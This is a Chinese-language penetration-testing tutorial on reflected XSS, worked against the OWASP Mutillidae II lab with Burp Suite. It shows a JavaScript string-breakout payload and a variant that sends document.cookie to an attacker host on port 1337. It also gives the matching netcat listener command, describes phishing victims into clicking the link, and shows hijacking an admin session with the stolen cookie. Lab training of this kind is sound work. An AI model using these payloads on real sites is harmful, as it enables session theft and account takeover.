相关阅读
data-postsbox="{"id":18126,"title":"【零基础学渗透】XSS漏洞的常见方式汇总","author":"Sec-Labs","author_id":10015,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/06/20220620034333407.png","cover_video":"","views":4681,"comment_count":255,"category":"cybersecurity","is_forum_post":false}">{"id":18126,"title":"【零基础学渗透】XSS漏洞的常见方式汇总","author":"Sec-Labs","author_id":10015,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/06/20220620034333407.png","cover_video":"","views":4681,"comment_count":255,"category":"cybersecurity","is_forum_post":false}
data-postsbox="{"id":8698,"title":"我们常说的盗号究竟是怎么回事?视频带你体验XSS攻击","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":6006,"comment_count":34,"category":"knowledge","is_forum_post":false}">{"id":8698,"title":"我们常说的盗号究竟是怎么回事?视频带你体验XSS攻击","author":"FancyPig","author_id":1,"cover_image":"","cover_video":"","views":6006,"comment_count":34,"category":"knowledge","is_forum_post":false}
data-postsbox="{"id":11474,"title":"【零基础学渗透】工具篇——BurpSuite","author":"Sec-Labs","author_id":10015,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/03/20220313155529975.png","cover_video":"","views":9400,"comment_count":663,"category":"cybersecurity","is_forum_post":false}">{"id":11474,"title":"【零基础学渗透】工具篇——BurpSuite","author":"Sec-Labs","author_id":10015,"cover_image":"https://static.pigsec.cn/wp-content/uploads/2022/03/20220313155529975.png","cover_video":"","views":9400,"comment_count":663,"category":"cybersecurity","is_forum_post":false}
视频讲解
网络钓鱼通常会通过JavaScript注入恶意payload,如果你在登录的情况下点击,往往会造成cookie泄露,恶意攻击者可以通过cookie直接登录,然后接管你的账号!
图文讲解
以下使用的是OWASP mutillidae II靶场
(其实视频中有一处翻译错误的地方,就是把mutillidae翻译成了multiple days了😊,不过并不影响咯)
我们打开burpsuite,开启拦截(这里显示intercept is on)
并访问password-generator相关页面,回车
点击Send to Repeater
之后我们可以对请求进行调整之后自由的发送,点击Send即可,这样在注入时就会方便很多
我们可以在响应中看到JavaScript的相关代码
我们可以将其复制到编辑器中进行修改,这样看的会清晰些
我们添加一段代码尝试获取cookie
其实就是截断了之前的JavaScript脚本
;}catch(e){}alert(document.cookie);try{hackerloiisveryhandsome="
我们添加的这个部分放到URL里就可以在输入时进行拼接了
我们可以直接在浏览器里粘贴,也可以用repeater发,这个看个人习惯
然后回车,有趣的事情就发生了,可以看到cookie通过弹窗的形式显示了
其实有很多网友都比较疑惑的就是,有这样的弹窗有什么用呢?如何利用呢?我很多时候扫描器都能扫出来一堆XSS的漏洞,让它弹窗。这里作者给我们分享了一种方式
;}catch(e){}var i=new Image;i.src="http://192.168.0.192:1337/?"+document.cookie;try{hackerloiisveryhandsome="
同时需要在攻击者的服务器上监听1337端口
nc -nlvp 1337
之后我们需要做的是把链接通过邮件或者聊天软件等方式进行投递,如果网友进行了点击
我们就可以在刚才开启1337端口监听的终端里找到cookie了
拿到cookie之后,我们使用firefox浏览器的F12开发者工具,找到cookie值,我们可以看到现在是Not Logged in,未登录的状态
修改之后回车,可以看到我们现在是管理员身份进行登录的了,这大概就是xss的魅力吧,无需账户密码,通过cookie登录接管账户!